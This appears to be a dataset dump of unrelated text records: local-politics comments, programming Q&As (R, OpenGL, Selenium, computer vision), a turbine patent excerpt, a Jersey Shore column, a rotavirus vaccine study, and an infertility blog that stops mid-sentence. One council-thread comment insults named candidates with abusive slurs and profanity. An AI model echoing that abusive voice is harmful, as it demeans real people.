text
stringlengths
2
1.05M
repo_name
stringlengths
5
101
path
stringlengths
4
991
language
stringclasses
3 values
license
stringclasses
5 values
size
int64
2
1.05M
Under angry public pressure our current “progressive” majority just voted for a special meeting next week (not yet posted on the city website) to decide if the Carrington Corporation can: 1) Share the cost of a $450K traffic signal with the city. 2) Accept a city financed loan. 3) Enter into a “Revenue Guarantee” agreement requiring Eureka to pay the $450K if this development fails to generate adequate revenue. “NO”, “NO”, AND “NO”!!!! Even the Eureka Chamber of Commerce testified against it! CalTrans and the State of California is responsible for the safety of Hwy 101 through Eureka and will eventually install all the signals needed. They are slated to install one next year at Broadway and Hawthorne. We will need many consecutive progressive councils before they develop the courage to actually revitalize Eureka by finally holding the owners of blighted properties responsible to clean up their act or loose their property. That is a massive misinterpretation of what the city is trying to do. 1) these are separate options under consideration, not a package of ideas formed into a plan. As in, maybe give them a loan if the use it to pay for the light. So the developer pays for the light, with a city loan. 2) the “revenue guarantee” is meant as a guarantee that the city receives the promised tax revenue, not a guarantee that the city will pay the developer. 3) city staff recommended that the city pay for the light outright because it is considered a safe investment, so the council is trying to get a better deal (not giving a handout). Hopefully–They will address the the slow, painful downward trend in downtown and old town. Main Street, badly needs revitalizing, and given new direction. It’s original mission has been eroded by over controlling City managers and a director that only is a servant of City staff. That is not the way it was designed to work folks. It no longer listens to the merchants issues, so they have learned to keep their mouths shut, and heads down. Too bad, because it has the potential to be a very vibrant district. Lets hope the new council sees it’s value (tax dollars) and retire the current director and get someone with vision, and take a more hands off approach. Hey, Tuluwat Examiner. Once all the votes have been counted, you should do a story about how much money Anthony “Fat Tony” Mantova 🍕 and John “The Fool” Fullerton spent per vote. 💰 Considering how badly both of those idiot Trumptards did in this election, that was money clearly not well spent! Seriously though. “Fat Tony” Mantova spent like $40,000 on a Eureka City Council race, if you can believe that corrupt bullshit! 🐘💰🔥. And Foolish Fullerton wasn’t far behind in the lighting his money on f**king fire game 💰🔥.
null
minipile
NaturalLanguage
mit
null
Q: Replacing "NA" (NA string) with NA inplace data.table I have this dummy dataset: abc <- data.table(a = c("NA", "bc", "x"), b = c(1, 2, 3), c = c("n", "NA", "NA")) where I am trying to replace "NA" with standard NA; in place using data.table. I tried: for(i in names(abc)) (abc[which(abc[[i]] == "NA"), i := NA]) for(i in names(abc)) (abc[which(abc[[i]] == "NA"), i := NA_character_]) for(i in names(abc)) (set(abc, which(abc[[i]] == "NA"), i, NA)) However still with this I get: abc$a "NA" "bc" "x" What am I missing? EDIT: I tried @frank answer in this question which makes use of type.convert(). (Thanks frank; didn't know such obscure albeit useful function) In documentation of type.convert() it is mentioned: "This is principally a helper function for read.table." so I wanted to test this thoroughly. This function comes with small side effect when you have a complete column filled with "NA" (NA string). In such case type.convert() is converting column to logical. For such case abc will be: abc <- data.table(a = c("NA", "bc", "x"), b = c(1, 2, 3), c = c("n", "NA", "NA"), d = c("NA", "NA", "NA")) EDIT2: To summerize code present in original question: for(i in names(abc)) (set(abc, which(abc[[i]] == "NA"), i, NA)) works fine but only in current latest version of data.table (> 1.11.4). So if one is facing this problem then its better to update data.table and use this code than type.convert() A: I'd do... chcols = names(abc)[sapply(abc, is.character)] abc[, (chcols) := lapply(.SD, type.convert, as.is=TRUE), .SDcols=chcols] which yields > str(abc) Classes ‘data.table’ and 'data.frame': 3 obs. of 3 variables: $ a: chr NA "bc" "x" $ b: num 1 2 3 $ c: chr "n" NA NA - attr(*, ".internal.selfref")=<externalptr> Your DT[, i :=] code did not work because it creates a column literally named "i"; and your set code does work already, as @AdamSampson pointed out. (Note: OP upgraded from data.table 1.10.4-3 to 1.11.4 before this was the case on their comp.) so I wanted to test this thoroughly. This function comes with small side effect when you have a complete column filled with "NA" (NA string). In such case type.convert() is converting column to logical. Oh right. Your original approach is safer against this problem: # op's new example abc <- data.table(a = c("NA", "bc", "x"), b = c(1, 2, 3), c = c("n", "NA", "NA"), d = c("NA", "NA", "NA")) # op's original code for(i in names(abc)) set(abc, which(abc[[i]] == "NA"), i, NA) Side note: NA has type logical; and usually data.table would warn when assigning values of an incongruent type to a column, but I guess they wrote in an exception for NAs: DT = data.table(x = 1:2) DT[1, x := NA] # no problem, even though x is int and NA is logi DT = data.table(x = 1:2) DT[1, x := TRUE] # Warning message: # In `[.data.table`(DT, 1, `:=`(x, TRUE)) : # Coerced 'logical' RHS to 'integer' to match the column's type. Either change the target column ['x'] to 'logical' first (by creating a new 'logical' vector length 2 (nrows of entire table) and assign that; i.e. 'replace' column), or coerce RHS to 'integer' (e.g. 1L, NA_[real|integer]_, as.*, etc) to make your intent clear and for speed. Or, set the column type correctly up front when you create the table and stick to it, please.
null
minipile
NaturalLanguage
mit
null
The subject matter disclosed herein relates to gas turbines, and more particularly to a torque control system and method for gas turbine start-up. During a gas turbine startup, there are typically two sources of torque to accelerate the gas turbine to full speed with no load. One source is from the gas turbine itself after it is fired and the other source is from a starter, external to the gas turbine, typically a static starter. Conventionally, an average time taken by the gas turbine to reach full speed with no load can be reduced by changing the initial firing of the gas turbine. However, by changing the firing of the gas turbine, operating temperatures of the gas turbine can be increased, which can damage various hot gas path components. As such, it is typically desirable to increase starting torque of the gas turbine by the external static starter, which can be an electric motor or power converter, for example. However, many static starters have set operational points corresponding to set RPM settings, which do not take into account changing operational parameters of the gas turbine, which can increase the amount of time for the gas turbine to start up.
null
minipile
NaturalLanguage
mit
null
Have some Java3d code I would like to try to port to Xith3d. I would like to run some benchmarks. I installed as recommended by xith.orgWhen starting the demos (CubeTest, ...)I get an empty black screen. Hi I'm assuming that if xith is failing then there would be some kind of stack trace, somewhere. On the other hand a black screen is strange, it should either be light grey like a normal swing background (meaning xith has failed), or a darker grey, meaning xith has managed to get to GL, but something has gone wrong with the boxes. Either way there should be a stack trace somewhere. How are you launching it, from a dos prompt?. Another option is that it's a graphics card driver problem, were you running the directX version of java3d?, does the opengl version of java3d work?, do *any* opengl applications work?, what OS are you on?, what graphics card and drivers do you have? Every transformation requires a call to glLoadTransposeMatrixf, which was only added in 1.3. It's easy to fix, though, by pulling the data from the matrix already transposed and call glLoadMatrixf instead - that's what I've done. I don't know of any other places where >1.2 is used, but I don't deny the possibility. I also must state that I don't know how JoGL handles OpenGL extensions - might it use the GL_ARB_transpose_matrix extension if it's available? It's easy to fix, though, by pulling the data from the matrix already transposed and call glLoadMatrixf instead - that's what I've done. Do you have a patch that we can apply to Xith3D renderer classes? This is exactly what I was thinking to do, because of this also seems to be a reason for problems with SiS graphic cards. If you have a patch, can you please submit an issue with attachment? I will add an entension check and the transpose if it is available. It is more effiecient to use the transpose load because that is the way we store our matrices. I didn't want to incure the overhead of matrix transpose. Yuri, I'm afraid I can't see any way to attach files to issues or submit an attachment at time of report. Are we talking about the dev.java.net issues page? Quote I will add an entension check and the transpose if it is available. It is more effiecient to use the transpose load because that is the way we store our matrices. I didn't want to incure the overhead of matrix transpose. David, in this particular case it'll make no difference either way - the current code is this: That reminds me. I also checked in a feature which should make it easier to diagnose problems. two new options: TRACE and ERROR_CHECK can be activated in code or via -DXITH3D_ERROR_CHECK=TRUE, etc to have the opengl error codes checked on every call. TRACE writes to a debug file every call and its parameters. Heh, yeah I saw that as soon as I looked into the problem. I have checked in a fix to remove the use of loadTransposeMatrix. Should be all set. Excellent, thanks! The drawObjectShadow instance can't be fixed in-place so easily. As Transform3D.get(float[]) basically does the same as the code I quoted above, could I suggest a Transform3D.getTransposed(float[]) method? This would neatly fix the problem and remove the need for yet another of these blocks in the future as well. Thanks. Great fix. Could be that this will also fix some other compatibility issues I have on my check-list. cfmdobbie, Quote Yuri, I'm afraid I can't see any way to attach files to issues or submit an attachment at time of report. Are we talking about the dev.java.net issues page? Yes, we are taliking about Issuezilla on dev.java.net. It should be [hopefully] possible to add an attachment after you submit an issue - just after submitting you get a confirmation page with an option to add an attachment. java-gaming.org is not responsible for the content posted by its members, including references to external websites, and other references that may or may not have a relation with our primarily gaming and game production oriented community. inquiries and complaints can be sent via email to the info‑account of the company managing the website of java‑gaming.org
null
minipile
NaturalLanguage
mit
null
Q: On studying web programming What are the best resource to study the following: JavaScript, AJAX, CodeIgniter Smarty? A: Though perhaps not suited as a first book on JavaScript, I recommend JavaScript - the Good Parts by Douglas Crockford. It will keep you from doing some dumb things. A: OReilly's Javascript: The Definitive Guide, 5th Edition (or later) http://www.amazon.com/JavaScript-Definitive-Guide-David-Flanagan/dp/0596101996/ref=dp_ob_title_bk A: Digging into JQuery and using it is a great way to crash course into something more complex than "hello world" with javascript In general, you will learn a lot if you just do stuff in this fashion. Pick a feature you think is cool Google it to find a solution Instead of copy/paste, make sure you understand what the code actually does, and how Change it in some way to make sure your understanding is correct \ Use Google to find out why your changes failed Rinse/Repeat
null
minipile
NaturalLanguage
mit
null
Nostalgia is generally seen as the domain of the elderly, who long for a return to the simpler, more carefree days of the 1950s — the days of Bobby socks and bobbed hair, Doo Wop music and cars with personalities. But, as this month's Student Voices contest revealed, you are never too young to pine for the good old days. The question, "What is your favorite Shore town?" elicited responses filled with wonderful memories and, for many students, seemingly distant memories of their early days on the beaches and boardwalks. Most of the recollections spoke to the food, the ice cream, the amusements, and the treasured times with family and friends. It was the reflections on the latter that really jumped out. The nostalgia. The longing for the past. The connections with parents and other older family members who had spent time at many of the same Shore towns as their kids today. MORE: So lucky to be born by the Shore: Excerpts from student essays It's remarkable how early in one's life nostalgia kicks in. I was no different. And I've remained nostalgic about the Shore during nearly every phase of my life. As with most longtime New Jersey residents, the beach towns have been an important part of my life's narrative. My favorites changed over time, but my attraction to the water, beach and boardwalks never did. When I was a youngster, my family split our time at Sandlass Beach in Sea Bright, where you could swim in the ocean on one side of Ocean Avenue and in the bay on the other side; Asbury Park, where we visited my aunt, who vacationed every summer at the Berkeley Carteret; and Ocean Grove, where my parents had friends who, fortuitously for me, had a freckled, red-headed daughter who was my first crush. When I became old enough to drive, I usually headed to Sandy Hook with my high school sweetheart during the day and to Asbury Park or Seaside Heights for the rides and other amusements at night. During my college days, most of my time was spent in Asbury Park, usually to attend concerts at the Convention Center — The Rolling Stones, Jefferson Airplane and Mitch Ryder still provide vivid memories. From then on, until the time I had children of my own, most of my precious vacation time was spent traveling the world — often in search of the best beaches. I found plenty of them, in the Caribbean, and central and South America: in Anguilla, Cuba, Margarita Island, Panama, British Virgin Islands, Brazil, Dominican Republic and elsewhere. When my wife and I began our family — all three kids are teenagers now — my focus returned to the beaches of my youth. Early on, my youngest son and I spent a lot of time in Asbury Park, where the beaches and boardwalk were largely deserted and the parking was plentiful and free — even on Ocean Avenue. Today, when we return to the city's resurrected oceanfront, it's mostly to play pinball at Silverball Museum or to ride bikes on the boardwalk stretch from Asbury Park, to Ocean Grove, to Bradley Beach, to Avon, and to Belmar early on summer mornings or late in the off-season. Sunday morning rides through the streets of Ocean Grove are particularly sublime. Another favorite trip down memory lane is to Sandy Hook, where the kids enjoy bike riding on the trails at the former Fort Hancock. That day generally ends with dinner at a seafood restaurant in the Highlands. As the kids grew older, their interest in go-karts, boardwalk games and junk food made us gravitate toward Point Pleasant Beach, Seaside Heights and Atlantic City. We also made an excursion to Keansburg — my first visit there in more than six decades in New Jersey. Today, most of our trips to the Shore are to Point Pleasant Beach — mostly for the seafood restaurants and ambiance, and to Long Beach Island, which until I started patronizing it regularly in recent years, had only visited once as an adult — a fall weekend at the Engleside Inn in Beach Haven. Today, LBI is our preferred destination. We generally visit later in summer days, after the sun has cooled down and the crowds (and badge checkers) have dispersed. We spend a couple of hours on the beach at Harvey Cedars, then head to Barnegat Light for dinner at Off the Hook, which has the best scallops on the planet, freshly loaded off the fleet of scallop boats next door at Viking Village. At least once or twice a season, we take the evening cruise on Miss Barnegat Light, which never gets stale for any of us. When it comes to the Jersey Shore, Bruce Springsteen had it right: Everything is all right. Nostalgia is a big part of it. If you've lived here long enough, having it come full circle with your children is as good as it gets. Randy Bergmann, a Westfield native and lifelong resident of New Jersey, has been covering the state as a reporter, editor and opinion page editor for four decades. Contact him at [email protected] or 732-643-4034.
null
minipile
NaturalLanguage
mit
null
Q: Estimating camera angles using homography I've been trying to estimate the euler angles (Rotz(yaw)*Roty(pitch)*Rotx(roll)) of a UAV from the homography between two frames. This means that the rotation I get from each frame to the previous one has to be multiplied by the previous one to get the total rotation with respect to the initial axes. So: R_accumulated=R01*R12*... Those R are obtained from decomposeHomography() in openCV. According to REP and OpenCV homography page, the camera reference is Z forward, X rigth and Y down but my UAV reference system is ENU. The question is how to get from that R_accumulated the dron orientation. The R_accumulated from the homography tells you how to convert one plane into another. So if I want the camera orientation, the camera have to do the opposite movement to get the same result ( inv(R_accumulated)) ? Then that camera orientation matrix should be transformed to ENU coordinates? I have tried doing this with several rotations but I do not get good results. The best one I've had is by getting the angles directly from R_accumulated and exchanging pitch and roll. That's a very good estimation but I still need to know some kind of rotation matrix from the camera frame to the UAV one. I don't know if you have understood me. A: Finally, I have the solution to my problem: If UAV axes are different from those of the camera, we have to find a matrix R1 that transforms UAV axes into camera ones and another one that does the same task the other way around, from camera axis to UAV axis, R2. The homography returns the value of translation and rotation that should be applied to the first PICTURE to get the second one. But we want the camera pose, not the picture one. So, for example, if the z axis is pointing at an object who has an arrow pointing upwards, a 90º rotation of the IMAGE around that forward axis will make the arrow point right. But this is not the rotation the camera has to do to get the arrow pointing right. If you want the arrow pointing right you have to rotate the camera -90º along that same axis. In conclusion, the camera movement is the inverse of the image, so the camera rotation will be the inverse of the homography rotation and the traslation will be -1*(homography_traslation) * scale_factor. Suppose we have a rotation R between the initial image and the final one. If we want to obtain the EulerAngles(preferable called Tait-Brian) as Rotz * Roty * Rotx of the UAV, we have to calculate the EulerAngles of R1 * inv(R) * R2. That R is the multiplication of all the intermediate rotations between frames so that R = Rinit * ... * Rend
null
minipile
NaturalLanguage
mit
null
Q: selenium web driver no longer working correctly I am using the selenium module in python and it has been working as expected until I had to update firefox today. After the firefox update, everytime webdriver.Firefox() is assigned to the variable driver, the firefox web browser opens in a default page and then the python program stalls waiting without executing the rest of the code. I am new to selenium so I do not know if there is a work around for this. from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC driver = webdriver.Firefox() driver.get(#somewebsite) A: you need to upgrade selenium to 2.45, which was released today. check out: https://pypi.python.org/pypi/selenium or pip install -U selenium
null
minipile
NaturalLanguage
mit
null
Rotavirus remains a major cause of severe dehydration, diarrhea, and death among children \<5 years of age in many low-income countries. After the introduction of Rotarix (Glaxo SmithKline, <https://www.gsksource.com>) rotavirus vaccine into Malawi's immunization schedule in October 2012, enhanced surveillance combined with case--control studies have described the substantial population impact and effectiveness of Rotarix on hospitalized rotavirus disease and diarrheal deaths ([@R1],[@R2]). Both of the globally available rotavirus vaccines, Rotarix and RotaTeq (Merck & Co., <https://www.merckvaccines.com>), have been shown to protect against rotaviruses with a broad range of G and P types, as defined by the 2 viral outer-capsid proteins ([@R3],[@R4]). A whole-genome classification system describes rotavirus strains more completely by assigning genotypes to each of its 11 double-stranded RNA segments ([@R5]). Most rotavirus strains contain either a Wa (G1-P\[8\]-I1-R1-C1-M1-A1-N1-T1-E1-H1) or DS-1 (G2-P\[4\]-I2-R2-C2-M2-A2-N2-T2-E2-H2) genotype constellation ([@R6]). Typically, G1P\[8\] strains, including the Rotarix strain (RIX4414), possess a Wa-like genetic backbone, whereas G2P\[4\] strains generally have a DS-1--like genotype constellation ([@R6]). A switch in predominant rotavirus genotype from G1P\[8\] to G2P\[4\] after Rotarix introduction has been described in various settings ([@R7],[@R8]), and higher vaccine effectiveness (VE) against G1P\[8\] strains has been described compared with G2P\[4\] in some settings ([@R2],[@R9]). It is not known whether these changes in strain distribution and strain-specific differences in VE are related to differences in cross-protection afforded by the outer capsid proteins (G and P type) or to the distinct genetic backbones possessed by DS-1--like strains and the Wa-like Rotarix strain. Previously, we demonstrated that all G1P\[8\] strains detected before Rotarix introduction in Malawi had a Wa-like genetic backbone ([@R10]). Shortly after Rotarix introduction, atypical DS-1--like G1P\[8\] rotavirus strains were detected, which provided an opportunity to examine whether emergence of DS-1--like G1P\[8\] strains could be the result of reduced protection afforded by the Wa-like G1P\[8\] Rotarix vaccine. The Study ========= We used enzyme immunoassay (EIA) to detect rotaviruses in stool samples collected from children \<5 years of age with acute gastroenteritis at Queen Elisabeth Central Hospital (QECH; Blantyre, Malawi) ([@R2]). We used reverse transcription PCR to assign G and P genotypes to rotavirus-positive samples ([@R10],[@R11]). Samples with sufficient volume and containing G1 (n = 110), G2 (n = 64), or other (G4, G9, or G12, n = 42) rotavirus strains were selected at random during January 2013--December 2015. We generated rotavirus whole-genome sequences (WGS) using the HiSeq 2000 platform (Illumina Inc., <https://www.illumina.com>) as described previously ([@R10]). We derived consensus sequences using Geneious (<https://www.geneious.com>) and genotyped them using RotaC (<http://rotac.regatools.be>). All complete nucleotide sequences generated in this study were deposited into GenBank ([@R12]) (accession nos. MG181227--941). We calculated rotavirus VE using logistic regression to compare 2-dose versus 0-dose vaccination status among hospitalized strain-specific rotavirus diarrhea case-patients and concurrently hospitalized control patients with non--rotavirus-caused diarrhea, matched by age at admission. We defined concurrency of controls for each endpoint ([Table](#T1){ref-type="table"}) as any patient hospitalized for diarrhea who tested negative for rotavirus occurring in the same date range (between the first and last hospitalized strain-specific case) in which cases of strain-specific rotavirus were detected. We limited VE analysis to infants \<12 months of age because previous analysis did not demonstrate statistically significant protection in the second year of life (VE 31.7%, 95% CI −140.6% to 80.6%) ([@R2]). We obtained ethics approval from the National Health Sciences Research Committee, Malawi (867), and the Research Ethics Committee of the University of Liverpool, Liverpool, UK (000490). ###### Point estimates of vaccine effectiveness by rotavirus genotype constellation based on the complete genetic composition of rotavirus strains, Blantyre, Malawi\* Rotavirus strain type Sequenced strains from test-positive case-patients† Rotavirus test-negative controls Adjusted logistic regression for year of presentation ----------------------- ----------------------------------------------------- ---- ---------------------------------- -- ------------------------------------------------------- ----- ------------ -- ----------------------- ------ DS-1--like G1P\[8\] 13 13 10 (76.9) 426 410 365 (89) 85.6 (34.4--96.8) 0.01 DS-1--like G2 30 28 24 (85.7) 481 465 411 (88.4) 48.5 (−154.3 to 89.6) 0.42 Wa-like G1 38 38 34 (89.5) 440 424 376 (88.7) 76.7 (−153.8 to 97.9) 0.23 \*Rotavirus strains detected at Queen Elisabeth Central Hospital during January 2013--December 2015. Case-patients were fully vaccinated infants \<12 mo of age.
†Complete whole-genome sequences were generated. Of 216 rotavirus strains sequenced, 114 (53%) had a Wa-like and 88 (44%) a DS-1--like genotype constellation. Among Wa-like strains, 72% were G1, \<1% were G2, and 25% were G12. Of the DS-1--like strains, 31% were G1 and 69% were G2. Of the 110 G1 strains analyzed by WGS, 75% were Wa-like and 25% were DS-1--like. We detected atypical G1 rotaviruses with DS-1--like genotype constellation in Malawi in 2013; their circulation peaked in 2014 and subsequently decreased in 2015 (\<1%, 1/72) ([Figure](#F1){ref-type="fig"}). ![Monthly number of rotavirus cases at Queen Elisabeth Central Hospital, Blantyre, Malawi. Numbers are based on the presence of either DS-1--like (A) or Wa-like (B) constellation of rotavirus strains.](19-0258-F){#F1} In logistic regression analysis adjusted for year of presentation, Rotarix effectiveness against DS-1--like G1P\[8\] rotavirus was 85.6% (95% CI 34.4%--96.8%; p = 0.01). Effectiveness estimates against Wa-like G1 (VE 76.7%, 95% CI −153.8% to 97.9%) and DS-1--like G2 (VE 48.5%, 95% CI −154.3% to 89.6%) rotaviruses included wide bounds and the null value ([Table](#T1){ref-type="table"}). Conclusions =========== Atypical DS-1--like G1 rotavirus strains emerged in Malawi shortly after Rotarix vaccine introduction ([@R10]). Although strain oscillation and emergence of novel types have been reported globally in the absence of vaccination, the mechanisms driving this phenomenon are not well understood. It is possible that the emergence of these DS-1--like G1P\[8\] strains was coincidental with vaccine introduction. The high VE strongly suggests that escape from vaccine-induced immunity is not the driver for emergence. The swift decline in prevalence of these strains is in contrast with more sustained changes in strain circulation described in other settings in the context of high VE ([@R13]). The decline could have been precipitated by the observed high VE or may represent a natural phenomenon related to viral fitness and associated periodic nature of the circulation of the DS-1--like strains, which has been observed historically and globally in the absence of vaccine. These findings support continued use of rotavirus vaccine in this population as an intervention to reduce severe diarrhea caused by rotavirus strains possessing either Wa-like or DS-1--like genetic backbones. The observed decline in rotavirus hospitalizations in children after vaccine introduction ([@R2]), together with reduction in infant diarrhea deaths in Malawi ([@R14]), are public health benefits that could be sustained through rotavirus vaccination in this region, which has one of the highest burdens of rotavirus disease. The VE against DS-1--like G1P\[8\] strains in this study resembles our previous findings of VE of 82% (95% CI 42%--95%) against all G1P\[8\] strains 3 years after vaccine introduction (2013--2015) ([@R2]). In contrast, we were unable to demonstrate statistically significant VE against DS-1--like G2 rotaviruses despite a comparable number of such strains, consistent with our earlier study (VE 45.9%, 95% CI −47.0% to 80.1%; p = 0.228) ([@R2]). The apparently lower VE against rotavirus disease caused by DS-1--like strains associated with G2, but not with G1P\[8\], lends support to the proposed dominant role of the outer capsid proteins VP7 and VP4 as drivers of homotypic protection. Although increasing evidence suggests that Rotarix vaccine does not provide the same degree of protection against G2 strains as G1 strains, this difference in protection appears to have little effect on total VE among populations in which vaccination performs optimally and high VE is maintained. However, the difference in protection between the strains may exacerbate underperformance of rotavirus vaccines in low-resource settings such as Malawi, where overall VE is generally lower for reasons that remain poorly understood ([@R2],[@R15]). We could not demonstrate statistically significant effectiveness against Wa-like G1P\[8\] rotaviruses (p = 0.23). Wa-like G1P\[8\] cases became dominant and replaced DS-1--like G1P\[8\] once vaccine coverage had reached high and stable levels ([Figure](#F1){ref-type="fig"}). At high population vaccine coverage, case--control analysis of VE became challenging and difficult to power sufficiently. Our data demonstrate that Rotarix provides a high degree of protection against severe disease caused by homotypic G1P\[8\] rotaviruses in Malawi regardless of genomic backbone. VE for patients \<1 year of age is comparable to that seen in middle-income countries. The lower VE against heterotypic G2P\[4\] strains previously described ([@R15]) suggests that more detailed immune response studies, clarification of the correlates of protection for rotavirus disease, and strain surveillance are needed to monitor the impact of sustained, high vaccine coverage on rotavirus strain distribution. *Suggested citation for this article*: Jere KC, Bar-Zeev N, Chande A, Bennett A, Pollock L, Sanchez-Lopez PF, et al. Vaccine effectiveness against DS-1--like rotavirus strains in infants with acute gastroenteritis, Malawi, 2013--2015. Emerg Infect Dis. 2019 Sep \[*date cited*\]. <https://doi.org/10.3201/eid2509.190258> These authors contributed equally to this article. We thank the laboratory staff at the Malawi-Liverpool-Wellcome Trust Clinical Research Programme and the sequencing and informatics teams at the Centre for Genomic Research (CGR), University of Liverpool, UK. This work was supported by an investigator-initiated research grant from GlaxoSmithKline Biologicals SA (eTrack no. 207219) and by the Wellcome Trust (Programme grant no. 091909/Z/10/Z and the MLW Programme Core Award). K.C.J. is a Wellcome Trust Training Fellow (grant no. 201945/Z/16/Z). M.I.-G. is partly supported by the NIHR HPRU in Gastrointestinal Infections. Author contributions: K.C.J., N.B.-Z., N.A.C., and M.I.-G. conceived and designed the study. K.C.J. and N.B.-Z. collected clinical data and stool samples. K.C.J. performed the laboratory work. K.C.J. and N.B.-Z. carried out the statistical analyses. K.C.J. drafted the manuscript, with major input from N.A.C. and M.I.-G. All authors contributed to interpretation of the data and commented on the manuscript. All authors have read and approved the final manuscript. Disclaimer: The funders had no role in the study design, data collection and interpretation, or the decision to submit the work for publication. GlaxoSmithKline Biologicals SA was provided the opportunity to review a preliminary version of this manuscript for factual accuracy, but the authors are solely responsible for final content and interpretation. The authors received no financial support or other form of compensation related to the development of the manuscript. M. I.-G. is affiliated with the National Institute for Health Research Health Protection Research Unit in Gastrointestinal Infections at University of Liverpool in partnership with Public Health England, in collaboration with University of East Anglia, University of Oxford, and the Quadram Institute. The views expressed are those of the author(s) and not necessarily those of the NHS, the NIHR, the Department of Health or Public Health, England. Potential conflicts of interest: K.C.J., N.B.-Z. and N.F. have received investigator-initiated research grant support from the GSK group of companies. M.I.-G. has received investigator-initiated research grant support from the GSK group of companies and Sanofi Pasteur Merck Sharpe & Dohme and Merck. O.N. has received research grant support and honoraria from Japan Vaccine and MSD for delivering lectures on rotavirus vaccines. N.A.C. has received research grant support and honoraria for participation in rotavirus vaccine data safety monitoring committee meetings from the GSK group of companies. All other authors report no potential conflicts. Dr. Jere is a Wellcome International Training Fellow who conducted this research as part of his postdoctoral studies. His research interests are in enteric viral pathogens.
null
minipile
NaturalLanguage
mit
null
I belong to a pregnancy after infertility group on Facebook and we each wrote up a bio of ourselves and our journey. I know there are a lot of you who have been following me for a long time, but I thought it would be interesting to post my bio, because the whole journey is here all in one blog post. Look, I even linked some past posts for your enjoyment. Someday, when my sweet baby is old enough, I will tell her exactly how much love and hope we had for her, long before she was conceived. My husband Chris and I started dating in 2004 and were married July of 2008. I was 22 when we got married. I was in nursing school at the time, so we waited until I graduated a year later “because I don’t want to be pregnant in nursing school.” I went off birth control May of 2009 and after using ovulation kits with timed intercourse without success, I went to my primary doctor in October of 2010. She did some basic tests, found nothing wrong and referred me to an OB/GYN. I was soon diagnosed with low progesterone as my 21-day progesterone level was 1.97. I started Clomid (unmonitored) and it made my progesterone go up to 16.5, but no pregnancy. I did three cycles of Clomid before we decided to take a break. In January 2012, I went to a new OBGYN and did 4 more rounds of Clomid. Looking back… I probably would have seen an RE earlier, but A) I was clueless and B) I was scared of the cost. Finally in November, I got a referral to CRM and we made an appointment. We had a $10,000 lifetime max on infertility treatments and another $10,000 for meds. Our first IUI with Clomid (again with the Clomid already) I ovulated early and we were told to do TI after my trigger shot… on Christmas Eve and Day. It was incredibly sexy and I am being incredibly sarcastic. We proceeded to do three actual IUIs that were back to back, all with Clomid and progesterone, all negative. When we conferenced with the doctor, it was determined that the next step was the big scary IVF. In April-June of 2013, IVF became a reality. However, in May, right before we were starting the cycle, our insurance company informed us that all the past claims they’ve been paying for the IUIs “never should have been paid” and they weren’t going to pay for anything else going forward. Remember Puppy Killer? Something about our clinic not being a “clinic of excellence” (even though CRM is the best clinic in Minnesota as far as success rates). After an emotional battle with them (I hate insurance companies) and lots of strings pulled by an HR rep at Chris’s work, we were grandfathered in for one IVF cycle. This was two days before I was to start my stims. The final US showed only 5 mature follicles and the doctor called me at work, telling me that because this was on the insurance company’s dollar, he felt we could proceed with retrieval. We ended up with 10 eggs, 5 that were mature, 3 became embryos and we were able to transfer our one remaining 3 day embryo in June. In July, the beta went from 63 to 56 and it was ruled a chemical on our 5 year anniversary. I took it hard. Really hard. I named him Adam, believing him to be a boy and grieved him for a long time. Even now, there is a pain in my chest when I think about him, because he was my first, he was the one that made me a mom. I started the process again in September for IVF #2, this time in the Attain program. That process signing up for Attain was fun too. We knew we’d either get that money back, or come home with a baby. Luckily, Chris was able to take a loan out against his 401k. This time we did a micro-Lupron protocol with trigger shots 12 hours apart. The final US showed 6 mature follicles all on my left side. The report showed 8 eggs, 4 were mature, one caught up later. But even after ICSI (where the sperm is injected right into the egg), we were only left with one day-6 embryo that was behind. I spent the two-week-wait in tears, knowing this cycle was a bust. I took one home pregnancy test, and it was negative and in November, I received a negative beta. We consulted with the doctor, talked about adding steroids with an antigon cycle (meds given to beef up the follicles without (hopefully) ovulating early). We were definitely looking at an egg quality issue, that much was very apparent. We decided on one more IVF before moving on to donor eggs. In December 2013, I started the process for IVF #3, but soon developed dangerously high BP which landed me in the ER. We determined the steroids were to blame, but I also had to be taken off the birth control pills and probably will never go back on them. The cycle was cancelled until my BP was under control with meds. In May 2014, things stabilized, I was able to go off the blood pressure meds, but eventually would go back on them for creeping blood pressure (my PCP warned me I may now have blood pressure issues for a lifetime). We started stims for IVF#3. The doses were adjusted and I did the antigon med, but still, only 5 eggs were retrieved and only 1 was mature, ironically, the worst cycle I’ve had. The embryo was behind, and not surprising, I got my BFN (big fat negative) at the end of the month. Attain, not surprisingly, kicked us out of the program (“You have shitty eggs, BIOTCH!”) and we ended up meeting with the donor coordinator in July for a fresh donor egg (DE) cycle. We couldn’t afford Attain for DE as it was about $45,000. We didn’t want to use an outside egg bank, so we looked at a fresh cycle for about $25,000. During this same time, my friend Celina contacted me, saying her clinic in Texas offers a guarantee program where if a cycle doesn’t work, the doctor waives his fees for the next cycle. We found out they have a donor program that was their own frozen egg bank. We decided to do a phone consult with a doc there and asked about that program. All in all, we found out it was about $10,000 cheaper than a fresh cycle here. We took a leap of faith, and in August, chose our donor, completed the paperwork and finalized it all. We flew to Texas in October 2014 for our cycle, which gave us 8 frozen eggs. We stayed with Celina and her husband (and of course became total BFFs in the process) and found out all 8 eggs fertilized! This was more than we’ve ever had. However, transfer day left us with a disheartened doctor and two embryos, one of which was a day behind, the other, two. We had nothing left to freeze. He thought it was because the eggs didn’t survive the thaw. This donor was not proven, but she looked the most like me and I went on a wing and a prayer. I received a faint positive 11dp5dt and experienced cramping and a “pulling” feeling down in my uterus. This was the first time, I had experienced actual pregnancy symptoms and I held out hope. But I received a BFN 14dp5dt and after consulting with the doctor with my symptoms and faint positive home pregnancy test, we determined it was another chemical. This was when I truly started facing the fact that having a child may not be in my future. It terrified me and I started asking myself if I could live without children. It was definitely a dark time, and we started casually talking about fostering, even though I knew this would never make it ok. Our Texas doctor wanted to run a miscarriage panel, including MTHFR. All my labs came back normal in December 2014 but behold, the MTHFR was positive. I couldn’t believe it. Finally, some sort of answer. Yes, we knew I had bad eggs, but maybe this was the reason we would lose the pregnancies that did make it. I was placed on Folgard for the folic acid deficiency which the MTHFR gene mutation could be responsible for (more or less. It’s a confusing thing) and a daily baby aspirin. We picked another donor in January 2015 and paid all the fees (less now, thanks to the doctor waiving his fees). I chose the most popular donor (no more messing around) and we faced the fact that this will probably be our last cycle. We had no more money, and really, when 3 IVFs and 2 donor cycles fail, what does that leave you with? We had already decided adoption was not for us, at least in the near future. In March, I started estrace as with my previous DE cycle, but 